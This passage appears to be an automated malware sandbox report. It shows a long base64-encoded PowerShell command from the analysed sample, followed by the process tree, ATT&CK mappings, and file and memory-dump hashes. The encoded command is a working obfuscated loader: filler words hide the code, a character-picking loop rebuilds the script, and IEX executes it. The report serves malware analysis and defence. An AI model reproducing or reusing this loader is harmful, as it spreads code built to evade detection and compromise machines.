BtAG8AbwBnAGkAUwB0AG0AYQBhAG4AUQB1AGEAZAByAG4ARgByAGkAdgBvAG8AUwBlAHQAbwBtAGMAUgB5AHQAbQBlADEAcABvAHMAdABlADkATgBpAHQAcgBvACwAVQBkAGsAcgB0AGkAUwB0AG8AcgB2AG4AUgBlAGgAbwBlAHQATQBhAHMAawBpACAAQwBvAHIAawBlAE0AQwBvAHcAZwByAGEAUABhAHQAaABvAHIAQQBwAGkAYQBjACwARQBtAGIAYQBsAGkAcABvAHMAdABhAG4ASQBtAHAAZQByAHQATABpAHQAaQBnACAAUwBrAG8AbABlAFMAUAByAG8AdABvAGwARABoAGEAbQBhAGkAUAByAGUAZABpAHAAUwBvAHIAdABlAHAAUwB1AGIAcwB0AGUASQBtAHAAYQBzACkATQBvAG4AbwBwADsACgBwAGUAcgBzAHAAWwBGAG8AbgB0AHcARABTAHAAaQBuAG4AbABPAHAAbABpAHYAbABQAHIAZQB0AHQASQBrAGEAcgB5AG8AbQBVAG4AYwBvAHUAcABGAG8AcgByAGUAbwBGAG8AcgBlAHMAcgBTAGkAZABlAHIAdABvAHIAZwBhAG4AKABMAGkAbgBlAG4AIgBJAG4AZABzAG4AQQBEAGEAbQBuAGUARABLAGwAYQB0AHQAVgBHAGwAYQBzAHAAQQBJAG4AdABlAHIAUABHAHIAZQBmAGYASQBBAHIAZwB1AG0AMwBTAHkAbQBwAGEAMgBEAGUAdAAgAFIALgBDAHkAYwBsAGkARABNAG8AbgBvAG0ATABGAHIAdQBnAHQATABQAGgAYQBlAHQAIgBiAHUAbgBkAGYAKQBIAGEAZwBsAGIAXQBLAG4AYQBwAHAAcABPAHAAaABhAHYAdQBFAGYAdABlAHIAYgBQAGEAcgBrAGUAbABKAG8AcgBkAGUAaQB2AGUAcwB0AGwAYwBUAGUAawBzAHQAIABOAG8AbgBzAHkAcwBTAGMAbABlAHIAdABHAGUAbgBpAHQAYQBEAHIAaQBrAGsAdABoAHUAbQBvAHIAaQBTAGsAaQBsAHQAYwBHAGUAbgBuAGUAIABEAGUAcgBtAG8AZQBUAHkAZgB1AHMAeABZAGUAdQBrAGUAdABFAHgAaQBtAGkAZQBTAHcAZQBlAHQAcgBMAHUAcgBlAHIAbgBTAHQAdQBuAGQAIABNAGUAZABpAGsAaQBDAG8AbABwAGUAbgBWAGkAdABhAGwAdABPAHYAZQByAGQAIABEAGUAZgBpAGwAUwBJAG4AdgBlAHMAZQBSAGUAaQBuAHYAdABUAG8AdABhAGwAUwBTAHcAZQBlAHAAZQBEAGkAdAB0AGkAYwBPAHYAZQByAHMAdQBNAGUAaQBrACAAcgBFAG4AZwBsAGkAaQBFAG0AYgByAG8AdABBAHIAZQBhAGwAeQBSAG8AZABvAG0ARABOAGEAcwB0AGkAZQBPAHUAdABkAHIAcwBPAHYAZQByAGgAYwBHAG8AbABkAGEAcgBLAGwAaQBtAHAAaQBrAGwAZQBzACAAcABGAG8AcgBtAGkAdABTAHAAbwByAHQAbwBiAGEAcwBlAGwAcgBCAGUAZwB1AG4ARABFAG4AdABlAHIAYQBTAHAAbwBvAG4AYwBNAHkAcgBpAG8AbABOAGkAYwBrAGUAKABDAG8AbABvAG4AaQBHAGUAbwBnAHIAbgBTAGUAYwByAGUAdABJAG4AdgBlAHMAIABmAGEAYgB1AGwAVQBQAHIAbwB0AGUAbgBIAHkAcABoAGEAZABQAG8AbgB0AGkAcgBUAGEAawBrAGEAdQBwAHIAZQBkAGkALABWAGUAcgBpAHMAaQBTAGMAYQByAGUAbgBCAGoAZQByAGcAdABTAG0AZQBsAHQAIABDAGEAcgBiAGkAUwBMAGUAZwBvAHMAdABQAGEAcgBhAGcAZQBBAG4AawBsAGEAbQBGAGkAbABtAHMAbQBBAG4AdABpAGsALABHAHIAYQBkAHUAaQBNAGEAZwBuAGUAbgBNAGUAZABsAGkAdABPAHYAZQByAGgAIABPAHAAYgB5AGcAbQBMAGEAYQBuAGUAdQBGAHUAZwBlAHMAbABTAHQAZQBsAGwAdABTAHUAYgBzAHQAaQBCAHIAZQBhAGQALABQAGUAcgBhAHUAaQBlAGwAZQBjAHQAbgBTAHAAbwB0AHAAdABIAHkAbABkAGUAIABLAHUAbABtAGkARABJAG4AdABlAHIAdQBUAGkAbABnAG8AZQBBAHAAYQByAHQAZgBHAHIAbwBzAHMAKQBMAHUAZgB0AHMAOwAKAFMAawBvAGwAZQBbAEQAZQBuAGUAcgBEAFUAbgBzAGgAYQBsAFQAZQByAG0AaQBsAEgAbwBsAGQAcwBJAG8AeABpAGQAYQBtAEkAbgBzAGMAcgBwAEUAeABpAHQAZQBvAEYAbwByAG0AeQByAHIAYQBkAGkAawB0AGQAbwBtAGkAbgAoAFMAdABvAGwAbwAiAFAAZQBsAHYAaQB1AFMAaQBkAGUAZgBzAEgAbwBtAGUAbwBlAEgAbwBtAGUAcwByAEUAZgB0AGUAcgAzAHMAYQBsAGwAeQAyAEEAbgBzAGkAZwAiAEwAeQBzAG0AYQApAFAAaABvAHQAbwBdAEQAYQBjAHQAeQBwAFMAYQBtAG8AcwB1AFMAYQBtAG0AZQBiAEMAbwBwAGUAIABsAFUAbgBjAGgAbABpAFQAZQBsAGUAbwBjAEEAcwB0AHIAbwAgAFQAcgBzAHQAZQBzAEIAZQBzAHYAcgB0AEgAZQBhAHYAeQBhAE0AYQBuAGYAcgB0AFQAdQBnAHQAZQBpAHkAbwBrAG8AbwBjAFAAYQBhAGIAZQAgAHIAaQBnAGUAbABlAE0AdQBuAGQAaAB4AEcAYQBzAG4AaQB0AEgAbwB2AGUAZABlAFUAZABlAG4AcgByAEYAbwByAGUAcwBuAEwAZQBnAGUAbgAgAFAAdQB6AHoAbABpAEYAbwByAHQAYQBuAEoAbwB5AHIAaQB0AFMAbgBhAHAAbwAgAEEAbgB0AGkAbgBHAFQAYQBsAGUAbgBlAE0AYQBrAHMAaQB0AFMAYwBpAGEAZwBEAE8AdQB0AGwAYQBDAEEAcABvAGsAYQAoAFIAbwBiAHUAcwBpAFUAZABmAHkAbABuAFUAbgBkAHMAZQB0AEIAcgBhAG4AYwAgAFQAdgBhAG4AZwBCAFYAYQB0AGUAcgBhAFAAbABlAHUAcgBzAE0AZQBsAGMAaAB0AFUAbgBkAGUAcgBuAFQAaABvAHIAYQBpAEYAcgBpAG4AZwApAEYAbwByAHMAdAA7AAoASwB3AGEAbgB6AFsARwBlAG4AZQByAEQARABhAGkAbAAgAGwAZABlAG0AIAByAGwAcwBwAGkAbgBkAEkAUwBlAHIAdgBpAG0AUwBtAGUAZABlAHAAQgBlAHQAdAB5AG8AVQBuAHQAaABpAHIAQQBpAHIAZAByAHQAaQBjAGgAdABoACgASwBvAG0AZQB0ACIAdgBhAHQAdABlAGsAQgBlAGMAbABvAGUAQgByAHUAbgBqAHIARwByAG8AdQBwAG4ARABpAHMAaQBuAGUAQgByAGUAdwBlAGwATwBiAHMAdAByADMASABhAG4AdABzADIATwB2AGUAcgBkACIARgB5AHIAYQBmACkATgBvAG4AYgBvAF0AUABhAGwAcABhAHAAQgByAGEAbgBkAHUAQgByAGEAbgBkAGIAQQBmAGgAbwBlAGwAUAByAGkAcwBsAGkATgBhAHoAaQBzAGMATgB5AGwAbwBuACAASQBuAGYAbAB1AHMAQgBhAG4AbgBlAHQAUgBhAG4AZABiAGEAUwBjAGEAcAB1AHQARgBlAGoAbAByAGkAUgBlAGQAZABlAGMAVwBlAGEAdABoACAAUgBlAGYAZQBlAGUAQgBvAG0AYgBhAHgAUwB0AG8AdQBuAHQAQgB5AGcAZwBlAGUAYQB2AG8AdQByAHIARQB2AGEAbgBnAG4AVABpAGwAcwBrACAAQQBuAGkAbAAgAGkAcwBwAG8AcgB0AG4ASQBuAHQAZQByAHQAdAB1AG4AZQBzACAAQgBlAGYAcwB0AEMARgBvAG4AZABzAHIAUwBrAGkAYQBiAGUAUAByAG8AYwBvAGEATwBwAGgAaQBvAHQAUgB1AHQAZQBiAGUAVAByAGEAawB0AFAAQwBsAG8AYwBrAGkATwBrAG8AbgBpAHAAQgBhAHIAcQB1AGUATQBlAHMAbwByACgATwBtAGwAcwBuAGkAUwBwAGkAZABzAG4AaQBkAGUAYQBsAHQARgBlAHIAcwBrACAAdQBuAHAAbABpAEUARgBsAHkAdgBlAG4AUwB2AGEAbgBlAHQAbgBhAHQAdQByAHIAUwBhAHYAbAAgAGQASQBuAGcAdQByAHIATQBhAHIAYQByACwAUABvAHIAdABhAGkATQB1AHMAaQBrAG4AQwBvAG4AaQBkAHQAUwBrAG4AbQBhACAARABpAGMAYQBjAEMAVgByAGQAaQBvAGEAQQBhAHIAaAB1AGsAdgBlAHIAaQBmACwATQBpAHMAYwBvAGkAUwBrAG4AaABlAG4AcwBsAGEAdABpAHQASgBvAHUAcgBuACAARQBnAG8AaQBzAEgAQwBvAHIAcgB1AHUAUwB1AGIAcwBpAHMASgB1AGwAZQBzAGEAVQBuAHAAaABvAHIAQgBsAGUAbgBkAHIAVAByAGEAbgBzACwARABvAHUAcABpAGkAUwBuAHUAcwBlAG4AUwBwAHIAZQBkAHQAUwBuAGUAcABwACAASgBhAGkAbABlAEoAVABvAG0AYgBzAGEAUwBvAG4AYQBuAGMATwB4AHkAYgBlAGsAQQBsAGIAdQBtAHkAQQBkAGUAbgBhACkASwBvAGsAZQB0ADsACgB1AG4AYQBjAGMAWwBVAGEAcgBiAGUARABUAHkAdgB0AGUAbABUAHIAdQBnAG0AbABWAG8AdgBlAGgASQBCAGkAcwBtAGEAbQBGAHIAZABzAGUAcABJAHMAdABlAG0AbwBPAHAAdABhAGcAcgBHAGkAbABkAG4AdABSAGUAZwBsAGUAKABzAHEAdQBhAG0AIgBVAG4AZABlAHIAZwBTAGsAbwB2AGIAZABEAGEAdABhAG0AaQBDAG8AdABzAGUAMwBnAHIAdQB0AGMAMgBLAG8AbgB2AGUAIgBUAG8AbQBtAGUAKQBGAHIAYQBmAHIAXQBVAG4AdABvAHUAcABQAHIAbwBwAHIAdQBNAGkAYwByAG8AYgBQAGUAcgB0AHUAbABCAGUAZgBvAGwAaQBPAHUAdABiAHUAYwBOAGEAYwBoAGUAIABHAHIAdQBuAGQAcwBTAGUAbABzAGsAdABLAGEAcgBsAGUAYQBTAGQAcwB1AHAAdABzAHAAbwByAHQAaQBtAHUAcgBlAG4AYwBzAGkAbgBnAGUAIABTAHkAcwB0AGUAZQBSAGEAYgB1AGwAeABQAGwAZQBuAHQAdABXAGkAbgBhAHMAZQBNAGEAYQBzAGUAcgBMAHUAZgB0AGsAbgBCAGUAbQB1AGYAIABSAGEAYgBsAGUAaQBJAG4AdABlAGcAbgBTAHUAZwBnAGUAdABTAHUAcABlAHIAIABJAG0AYgByAHUARwBCAGUAcABsAGEAZQBQAHIAZQBiAG8AdABhAGQAZwBhAG4ASQBDAGgAYQBwAG0AQwBDAG8AdAB0AG8ATQBUAG8AZQByAHQAUABOAG8AbgByAGkAcgBJAG4AcwB1AGwAbwBzAGMAaABsAGUAZgBTAHYAaQBkAG4AaQBIAHkAZwBlAGUAbABOAG8AbgBjAGwAZQBTAHUAYgBvAHIAKABOAG8AbQBpAG4AaQBVAG4AZABpAGYAbgBCAHIAbwBuAHoAdABNAHUAbAB0AGkAIABUAGUAawBuAG8AQQBBAGMAYwBpAGQAZgBEAGkAcABsAG8AZgBBAGQAdgBhAHIAaQBzAHQAZQBuAHIANwBTAGsAcgBlAHMAOABDAGgAaQBlAGYALABGAGEAbABrAHMAaQBFAGwAZgBvAHIAbgBNAG8AcwBhAHMAdABrAGEAbQBwAGUAIABMAG8AZwBhAHIAVQBUAGkAbABiAGEAbgBTAHUAcABwAG8AZABOAHkAeABpAHMAZQBBAHIAYQBjAGUAcgBCAGEAcgBiAGEAdABCAGUAdwBpAGwAMgBzAHUAcABwAG8ALABtAG8AdQByAGkAaQBhAGMAYwByAGUAbgBBAGwAYQBsAHUAdABGAG8AbABrAGUAIABQAGEAcgBjAGUAQgBwAGEAcgBhAHAAYQBmAG8AcgBsAG4AYQBGAHIAZQBtAGsAKQBNAGkAcwBwAHIAOwAKAFMAbwBtAG4AYQBbAEMAaABpAG4AaQBEAEcAaQBsAGUAbgBsAFIAZQBrAGwAYQBsAHAAYQByAGEAbQBJAEoAbwByAGQAcwBtAFAAbABlAGsAaABwAFIAbwB0AGEAbABvAE8AdgBlAHIAaQByAGcAeQByAG8AZwB0AEwAYQBuAGcAdgAoAEEAbgB0AGkAbAAiAEcAbABnAGcAZQBrAEMAYQBtAGEAcgBlAHcAaABpAHQAdAByAEYAbABkAGUAawBuAE4AbwBuAGEAbgBlAGoAbwB1AHIAbgBsAFMAdgBlAG4AZAAzAFIAdQB0AGkAbgAyAE0AZQBuAHQAYQAiAFMAeQBnAGUAbAApAFUAbgB0AHIAYQBdAEQAYQBtAGEAcwBwAFAAbwBzAHQAbAB1AEwAaQBxAHUAaQBiAFUAZgBhAHIAbABsAEYAbwByAHQAdQBpAFIAZQB0AHMAdgBjAGMAeQB0AG8AZwAgAFMAbQBpAHIAYwBzAFUAaQBnAGUAbgB0AFcAaQBtAHAAbABhAFMAbABhAGcAdAB0AEgAZQBtAGkAYQBpAFQAcgBhAHYAZQBjAEYAcgBkAHMAZQAgAFMAbABqAGYAZQBlAEkAcwBmAGwAYQB4AEgAagBlAHIAdAB0AFIAZQBjAGgAYQBlAGYAaQBuAG4AcwByAEMAbwBuAG4AYQBuAEUAdABoAGUAbgAgAEQAYQBnAGQAcgBJAEQAYQBuAG4AbwBuAEIAYQBjAGsAdQB0AEUAbgBkAG8AdABQAEMAbwB1AG4AdAB0AE0AaQBuAGkAcwByAEQAeQByAGUAdgAgAEMAaQBuAG4AYQBFAEwAeQBzAHQAZwBuAFMAdQBiAG8AcgB1AFUAZABmAGwAeQBtAEUAYwBjAGwAZQBTAFAAZQBsAGkAawB5AE4AaQBjAGgAbwBzAFIAZQBzAGIAZQB0AEEAcgB0AHMAYgBlAEgAYQBtAGkAbABtAEIAZQBzAGEAYQBMAFMAYwByAHUAcABvAEgAYQBuAGcAZQBjAEgAbgBkAGUAbABhAFQAaQBkAHMAcwBsAEsAYQByAGEAawBlAFMAdABlAGwAcwBzAFQAcgBpAGMAawBBAFUAbgBwAHIAbwAoAFYAaQBuAHQAZQB1AFMAYQBuAGcAYgBpAE8AegBvAG4AaQBuAEYAYQBrAHQAbwB0AGsAcgBhAHYAcwAgAEMAbwBtAGEAdAB2AEkAbgBrAG8AbQAxAFQAaQBuAGMAaAAsAEYAbwBzAGYAbwBpAE0AaQBjAHIAbwBuAFAAYQByAGUAaQB0AFUAYgBlAHMAdAAgAEMAbwBuAGkAZAB2AFUAZABzAHYAdgAyAEMAaABlAHAAcwApAEkAbgBkAHQAZwA7AAoASQBvAGQAbwB0AH0ACgBVAGgAeQByAGwAIgBJAG4AawBuAGkAQAAKAFIAYQB0AHQAbwAkAHQAZQBnAG4AZQBLAEYAbABlAGsAcwByAGcAcgB1AG4AZAB5AFMAdQBnAGEAcgBtAEIAZQBzAGwAYQBwAFMAdgBhAHIAcwBlAFQAaABhAG0AaQBzAFMAdABvAG4AeQBjAFMAdABhAGwAaQAzAEsAbwBkAGUAcgA9AFYAYQBwAG8AdQBbAE0AbwBuAHQAcgBLAEkAbgB0AHIAYQByAEcAcgBzAHMAbAB5AFMAdQBiAHAAZQBtAHUAcgB1AGcAdQBwAFYAaQBnAGEAbgBlAFMAcAByAGkAbgBzAFAAcwBlAHUAZABjAEYAcgBpAG8AcgAxAHAAYQByAGwAYQBdAEEAbgB0AGEAZwA6AEkAcgBpAGQAbwA6AEUAbgBkAG8AYwBWAEwAcwBrAHUAcgBpAFIAZQBiAGEAbAByAEIAZQBhAHIAYwB0AEgAagBlAHIAdAB1AEEAYwBjAGkAZABhAFMAdABlAHIAbgBsAFMAYwBlAG4AZQBBAFAAYQByAHQAbwBsAEEAbQBwAHUAbABsAGYAdQBzAGUAbgBvAFQAcgBzAHQAZQBjAEgAZQBtAGkAZQAoAGgAbwBvAGQAaQAwAFcAaQBuAGcAYgAsAEEAZQBvAGwAbwAxAFYAcgBuAGUAbgAwAEEAZgBvAHIAaQA0AHMAcABlAGUAZAA4AFAAcgBpAHMAZwA1AEUAbAByAGkAdAA3AFMAdQBiAG4AZQA2AFMAdQBtAG0AZQAsAEsAYQByAHQAbwAxAEsAbwBuAHMAaQAyAFQAcgBpAG4AYQAyAE8AcgBnAGEAbgA4AFMAaABhAGQAeQA4AEsAbgB0AHIAZQAsAFAAbwBzAHQAYQA2AG8AeABpAGQAaQA0AEEAbABsAGUAcgApAAoARgBsAGUAdAB0ACQARgBvAHIAZgByAFMASQBtAG0AdQBuAHAASgBpAHMAbQBzAGkAVQBkAGsAbABhAHIAVQBkAHYAYQBzAGEAQQBuAGwAYgBzAG4ASAB5AHAAZQBkAHQARwBlAHMAdABhAGUATABlAHQAYwBoAHIATwBwAGEAZABnAD0ASABhAGEAbgBkACgAUAByAGUAZgBlAEcASQBsAGwAaQBiAGUAQQBuAHYAaQBsAHQATQBpAHMAcwBpAC0ARgBvAHIAdAB5AEkAUwBwAGUAYwBpAHQAUABlAHIAbABlAGUATQBpAGwAbABpAG0ATQB1AGwAdABpAFAAUAByAG8AdABvAHIAQwBvAHMAbQBvAG8AQQBmAHAAYQB0AHAAUgBhAGEAcwB0AGUARgByAGUAbgBlAHIAUwB1AHAAZQByAHQAQgBhAHIAYgBlAHkAVAB1AHAAaQBsACAAVwBlAHMAdABsAC0ARQBuAG0AZQBzAFAAUAByAGUAdgBhAGEARQBhAHIAdABoAHQAUwBvAGYAYQB2AGgAUwB0AGUAcgBlACAAUgBlAGMAaABhACIAVABvAHIAYwBoAEgAVABpAGQAcwBzAEsASwBhAG0AYgBvAEMARABpAGEAbABlAFUAUABlAG4AZwBlADoAbABpAG4AZwB1AFwAQwBvAG4AYwBvAFMARwByAG4AcwBlAG8AUwBhAGwAbQBlAGYAVQBkAGwAcwBuAHQAUgBlAHAAZQBsAHcARgBvAHIAZQBzAGEASQBuAHQAZQByAHIARABpAGEAdAByAGUAQgByAHUAdAB0AFwAYgBhAHIAbgBlAFQARgBhAGEAdABhAHIARwByAGUAZQBuAHkATgBvAG0AYQBkAGsASQBuAGQAYgBlAGsAVgBpAGwAbABhAGUAUABlAHIAaQBmAHIAawBhAHAAaQB0AHMAUwBsAGkAawBrAHMAcABhAHIAcwBsAGwAVAByAG8AbABsADIAQQB1AGwAZQB0ADMAVAB5AHAAZQBlADkATwBrAGsAZQByACIATwBtAGkAYwByACkAYQBqAG8AdQByAC4ARgBlAGoAbABwAFAARgByAGUAbQBrAHIAUABoAHkAbABhAGEAUwB1AHMAcABlAHQAUABqAGsAawBlAGkAVAByAHYAcgBrAG4ACgBSAG8AcwBjAG8AJABDAGgAcgBvAG4AQgBGAGwAZQB0AGMAZQBTAHQAYQB0AGkAYgBmAGkAcwBzAGUAbwBTAGEAbgBkAGoAZQBSAGkAbgBnAG4AbABNAG8AZABpAGYAcwBCAHIAdQBnAGUAIABFAHAAaQBwAHMAPQBJAG4AZABrAG8AIABNAGEAcgBrAGUAWwByAGgAZQBuAGkAUwBPAHIAZABkAGUAeQBKAGEAZwB0AGgAcwBGAGkAcgBlAG0AdABGAGUAZAB0AGcAZQBFAHQAaABlAHIAbQBHAGUAbgBuAGUALgBMAGEAawBzAGUAQwBBAGQAbQBpAHIAbwBhAG4AdABpAHMAbgBTAGEAdQBuAHQAdgBmAG8AcgBzAGkAZQBrAGwAYQByAGUAcgBGAHIAeQB0AGwAdABNAHUAcwBlAHQAXQBBAGYAZwBpAGYAOgBPAHAAYQByAGIAOgBIAGkAcwB0AGkARgBWAGEAcgBpAGEAcgBOAGUAdABtAGUAbwBBAGYAcwB5AHIAbQBSAGUAZgBlAHIAQgBDAHIAZQBhAGQAYQBzAGsAcgBkAGQAcwBEAGkAcwBrAGYAZQBTAGMAbwByAGUANgBMAHUAbQBiAGEANABCAGEAcgBuAGwAUwBCAGUAdABlAG4AdABTAG8AbAByAHUAcgBGAGwAYQBzAGgAaQBCAGkAcgBlAGYAbgBDAHUAcwB0AG8AZwBXAGkAcgBlAGIAKABEAGUAbgBlAGIAJABpAG4AdABlAHIAUwBBAGQAZQBuAG8AcABWAGEAcABvAHIAaQBCAGkAYwBrAGUAcgB1AGwAZABzAHAAYQBHAGUAbgBkAHIAbgBEAHIAeQBzAG4AdABUAGkAbABzAGkAZQBBAG4AdgBlAG4AcgBtAGkAcgBhAGsAKQAKAFMAaQBnAGkAbABbAHYAcwBlAG4AcwBTAEEAbABsAG8AawB5AFcAaQBuAGQAcABzAFYAaQByAGcAdQB0AFUAZABmAG8AZQBlAFYAYQByAHMAbwBtAE0AZQBzAHMAaQAuAEQAaQBsAHUAdABSAFUAbgBiAG8AcgB1AEIAaQBzAHQAaQBuAEMAbwBuAGMAZQB0AEcAZQBuAG4AZQBpAEEAbQBvAHIAYQBtAEgAbwBkAGcAZQBlAFMAdQBnAGcAZQAuAFQAaQBsAHMAawBJAEsAbwBtAG0AdQBuAEgAeQBkAHIAbwB0AEsAbwBtAHAAZQBlAFQAaQBsAHMAbQByAFUAbgBoAG8AbgBvAE0AYQBnAG4AZQBwAEQAZQBzAHQAcgBTAEsAbgBhAHAAaABlAE0AbwBuAG8AdAByAFQAaQBsAHMAdAB2AEEAZgBzAGEAZwBpAE0AdQBjAG8AdgBjAEEAZgBzAG8AbgBlAEYAbwByAGIAbABzAHQAagBlAG4AZQAuAFMAdABlAG0AcABNAEMAbABpAG4AZwBhAEIAbABhAG4AawByAEYAbAB1AG8AcgBzAEYAbwByAHMAdABoAG0AdQBzAGsAdQBhAEUAagBlAHIAaQBsAEEAcwB0AGUAcgBdAEQAaQBhAHQAZQA6AEMAYQBuAG0AYQA6AFMAdABvAHcAIABDAEEAcgBsAHkAIABvAFUAbgBqAHUAcwBwAFMAcABhAGwAdAB5AEEAYwBjAHUAcwAoAE8AZgBmAGkAYwAkAEEAYwBhAHQAZQBCAFIAcwB2AHAAIABlAFQAdQB0AG8AcgBiAEEAcgB0AGUAZgBvAEsAdQBuAG4AZQBlAEYAcgBlAG4AYwBsAEIAYQBzAHMAZQBzAEEAZwBuAGUAbgAsAHUAbgBzAHQAbwAgAE8AcABpAG4AaQAwAEIAcgBvAHcAbgAsAGUAcgBoAHYAZQAgAFAAbwBsAHkAZwAgAEQAZQByAGkAdgAkAE0AdQBuAGkAdABLAFAAbABhAG4AZQByAEIAeQBrAGUAcgB5AFMAdABlAG0AbQBtAEYAcgB5AHMAZQBwAFMAZQBtAGUAaQBlAFAAcgBvAGYAaQBzAFYAbwBjAGkAZgBjAEEAbgBnAHMAdAAzAFMAawByAGEAYgAsAEQAcgBvAGkAbAAgAFIAZQBuAHMAawAkAEQAZQBjAGMAYQBCAFMAcABhAGwAdABlAEcAYQBuAGcAZQBiAEsAbwBtAG0AdQBvAEEAZgBnAGEAbgBlAEkAbABpAG0AYQBsAE4AZwBvAG0AYQBzAG4AbwBuAGEAZAAuAFAAbABlAGcAYQBjAEIAcgB5AHMAdABvAFMAaQBnAHQAZQB1AEcAYQBuAGcAYgBuAEYAbwByAHQAcgB0AFIAbwBhAGQAdAApAHMAYwB1AHQAYwA7AAoASgB1AGQAYQBpAFsAWgBvAG4AaQBuAEsARQBkAGQAZQByAHIAVQBkAHMAawB5AHkAQgBuAGsAZQB2AG0AQwBhAHMAdABpAHAARwByAGEAbgB1AGUAUABvAGkAcwBlAHMARQBwAGkAZwBhAGMAVQBuAGYAcgBlADEAYgBoACAAYgBlAF0AUwBoAHQAaQBjADoAQgBpAGwAZgBvADoAWgBhAGkAcgBlAEUAcwBjAGwAZQByAG4ASQBuAGQAaQBzAHUAeQBhAG4AZABlAG0ARwByAGEAZABlAFMATwB2AGUAcgBhAHkAUABvAGcAaQBlAHMASwBvAG4AawBsAHQASwBsAGUAcwBrAGUASgB1AG0AcABlAG0AUwBhAG4AZABoAEwAYQBuAG4AdQBsAG8AUwBwAGkAbgBkAGMAVwBlAGEAcgBhAGEAVAByAGsAbgBpAGwATQBhAGwAbwBjAGUASwBhAHQAYQBwAHMATgBhAHQAYQB0AEEARABvAGsAdQBtACgATABhAG0AYQBpACQAUgBhAHQAcwB0AEsATwB2AGUAcgBpAHIARwBsAGEAbgBlAHkATQB1AGwAYwB0AG0AYQBtAGkAdAAgAHAASwBhAGgAeQB0AGUATwBwAG0AdQBuAHMASwBsAGkAbgBpAGMAcABhAGwAYQBlADMAQQByAHYAZQBkACwARABlAGwAZwBnACAAQwBvAG4AZgByADAAVAByAGEAbgBzACkARABpAHAAcwBvACMACgAnAEAADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQA1ADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAHIAdgBpAHQAdQB0AC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAQQByAGMAaABnACAAPQAgACQAQQByAGMAaABnACAAKwAgACQAUwBlAHIAdgBpAHQAdQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADEAKQANAAoACQANAAoACQBpAGYAIAAoACQAUwBlAHIAdgBpAHQAdQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEEAcgBjAGgAZwAgAD0AIAAkAEEAcgBjAGgAZwAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAEEAcgBjAGgAZwANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ore5b2zy\ore5b2zy.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CB0.tmp" "c:\Users\Admin\AppData\Local\Temp\ore5b2zy\CSC8FBAAE4E6CBA43FAA9BAB613B781B4FB.TMP"
      4⤵
      PID:2112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1CB0.tmp

Filesize
1KB

MD5
c2cba9c3f48b9fef6e8e083326abcbcd

SHA1
c959f9b46bef27c3c7e6751d22b1e37cab60ce19

SHA256
6aee2dc8c3385eb7f4ea2180c4124a8b99c2ae27f171d5d22688c07a902582d8

SHA512
1a724cf0ed6b60dd7fddd9f6cab07df28ac9ac8caeaa12f8666ca9bcc240b993f7ebccd5a97f5d1cf6f33c64b2c45d445092137c8caa8a213311d8007902e948

Download Submit
C:\Users\Admin\AppData\Local\Temp\ore5b2zy\ore5b2zy.dll

Filesize
4KB

MD5
3cbd233c72fceedce154d9c83b79c9f7

SHA1
97e234571638e92e80509cd715dced4c25eadda2

SHA256
0bd5215c657b96607af38b0bf8fecc4f56eb72b6bab3ec59a646c3fdd6e380c6

SHA512
75c6d83e8246ae27a130b5a78aef80cb3f06574bc1d1be58b66df4ad8c2d543d05427247d32c6e1bdc3248bcdba5879c79e966909ad538e9fa9d7229ab6a19c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ore5b2zy\CSC8FBAAE4E6CBA43FAA9BAB613B781B4FB.TMP

Filesize
652B

MD5
5ea30c45c5a4121fcc3a09a7fe774b73

SHA1
8f6bd79dcec646fb4505303db67ee8ebbc7bc65d

SHA256
fc8b1ecd8c1f5cf489f4980a02cf268d26f244172dd87bd8ae16e4ce0500be33

SHA512
11954f12cc57a7f23b3927594209ede052766b8b1d643075eca57501431eae97019fbeb2557df3be3f92805232b168185da08f24db8305dcc7fa1ebfc388de51

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ore5b2zy\ore5b2zy.0.cs

Filesize
1KB

MD5
7b62b00b59b2ff9eaa0d329f281073b6

SHA1
61a24f7a970e9d27f73f683d2ecc33302ccc2bea

SHA256
7f68511a382f007efdfc8ae5ebdabd6259f49fecce1d9e1bf3ffd429a53f8691

SHA512
56eb7adb8521a939b11b913c9bf3c7bd960d4acaae5d20661516a3f31542b578e151171f55bd9df79c1f1958dd89ab90ce02c5723551d1f615961eda16fa2d1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ore5b2zy\ore5b2zy.cmdline

Filesize
369B

MD5
598480aac16bd660dab2ea1891c2fb21

SHA1
9392c3c94985003b9a49360b9d7b3137b4279549

SHA256
a123d462200f78e528b85b385828ede311ceddc93c040ab2599e09a4419263cd

SHA512
0367f719cf376f70a103a9e4148ab3029dd3a556717b6be7671545e5def977fd85c6b290d91279c82fe76e7fc775d64b7721971e767bfecfae5a80d1097d0397

Download Submit
memory/4884-135-0x0000000004D30000-0x0000000004D52000-memory.dmp

Filesize
136KB

Download
memory/4884-134-0x0000000004DC0000-0x00000000053E8000-memory.dmp

Filesize
6.2MB

Download
